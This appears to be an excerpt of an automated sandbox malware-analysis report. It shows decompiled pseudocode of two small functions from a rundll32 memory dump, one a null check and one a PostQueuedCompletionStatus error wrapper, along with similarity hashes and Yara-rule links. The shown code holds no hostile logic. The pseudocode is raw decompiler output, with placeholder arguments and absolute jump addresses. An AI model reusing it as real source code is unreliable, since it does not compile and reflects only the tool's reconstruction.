                • API ID: CurrentThread$ErrorFileLastRead
                • String ID:
                • API String ID: 895653707-0
                • Opcode ID: 247f43cfc954d39203f53dc2233411e47b8fdd5f97424ed2fa319d8570cd04a2
                • Instruction ID: ccb2115257c8f26245faf46a55ccbb8775d3be540504e9cc5a25ab669bd70c37
                • Opcode Fuzzy Hash: 247f43cfc954d39203f53dc2233411e47b8fdd5f97424ed2fa319d8570cd04a2
                • Instruction Fuzzy Hash: 23314F3A215FA086E7209B66E54871AB7A0F788BE4F148613EF5957B98CF3DD491CF00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C808BE70 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000285285C808BE70(void* __rdx) {

				if (__rdx != 0) goto 0xc808be82;
				return 0;
			}



                0x285c808be77
                0x285c808be81

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39e2ae9d972135b19e8721c0c272893ea021ef14bacb15c7e938a42317222523
                • Instruction ID: 947a62c7b10fd9e17ba8596d35871d2a4837052fde5ea69f03e04d1724cd3bfc
                • Opcode Fuzzy Hash: 39e2ae9d972135b19e8721c0c272893ea021ef14bacb15c7e938a42317222523
                • Instruction Fuzzy Hash: 7CF0BEA9703E1556EE1CF71580AA36C05A2E7597F0F808726A33D557C6AD8C40818B01
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8063DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E00000285285C8063DF0(long long __rax, long long __rbx, void* __rcx, void* __rdx, long long _a8) {
				char _v56;
				long long _v64;
				long long _v72;
				char _v80;
				long long _v88;
				void* _t34;
				void* _t35;
				long long _t47;
				long long _t61;
				void* _t62;

				_t50 = __rbx;
				_t47 = __rax;
				_v88 = 0xfffffffe;
				_a8 = __rbx;
				_t3 = __rcx + 0x34;
				 *_t3 = 1;
				if ( *_t3 != 0) goto 0xc8063ec7;
				_t5 = __rcx + 0x38;
				 *_t5 = 1;
				if ( *_t5 != 0) goto 0xc8063ec7;
				r9d = 0;
				r8d = 0;
				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0xc8063ec7;
				_t34 = GetLastError();
				E00000285285C805F380( *((intOrPtr*)(__rcx + 0x28)), __rdx);
				_t61 = _t47;
				_v80 = _t47;
				_v72 = _t47;
				if ( *((intOrPtr*)(_t61 + 8)) + 0xda812030 - 1 <= 0) goto 0xc8063e7d;
				 *((intOrPtr*)( *_t61 + 0x30))();
				goto 0xc8063e82;
				_v64 = 0xda812030;
				_v80 = _t34;
				_v72 = _t61;
				if (((0 | _t34 != 0x00000000) & 1) == 0) goto 0xc8063ec7;
				if (0x4d54ee85da812032 != 1) goto 0xc8063ea5;
				if (_t34 == 0) goto 0xc8063ec7;
				E00000285285C8060B90(_t35, __rbx,  &_v56,  &_v80, "pqcs");
				return E00000285285C806DF30(_t34, _t50,  &_v56, _t62, "pqcs");
			}













                0x285c8063df0
                0x285c8063df0
                0x285c8063df6
                0x285c8063dff
                0x285c8063e0e
                0x285c8063e0e
                0x285c8063e13
                0x285c8063e19
                0x285c8063e19
                0x285c8063e1e
                0x285c8063e24
                0x285c8063e27
                0x285c8063e36
                0x285c8063e42
                0x285c8063e44
                0x285c8063e49
                0x285c8063e4e
                0x285c8063e53
                0x285c8063e6d
                0x285c8063e77
                0x285c8063e7b
                0x285c8063e89
                0x285c8063e8e
                0x285c8063e92
                0x285c8063e99
                0x285c8063e9f
                0x285c8063ea3
                0x285c8063eb6
                0x285c8063ed4

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CompletionErrorLastPostQueuedStatus
                • String ID: pqcs
                • API String ID: 1506555858-2559862021
                • Opcode ID: c5c792db30b7c14ccf9868605fe78f4305e3ec2e17efe680536f6939b843083c
                • Instruction ID: d6b8c93fdfc3d8d4a69478d3b7c5ee3d3f94e9022efdd8a3fb207f8b621dfa3b
                • Opcode Fuzzy Hash: c5c792db30b7c14ccf9868605fe78f4305e3ec2e17efe680536f6939b843083c
                • Instruction Fuzzy Hash: 5921F336B12F9086EBA08B16A48475E23A0F785794F10D22ADEAD937D4DF3CC855CF40
                Uniqueness

                Uniqueness Score: -1.00%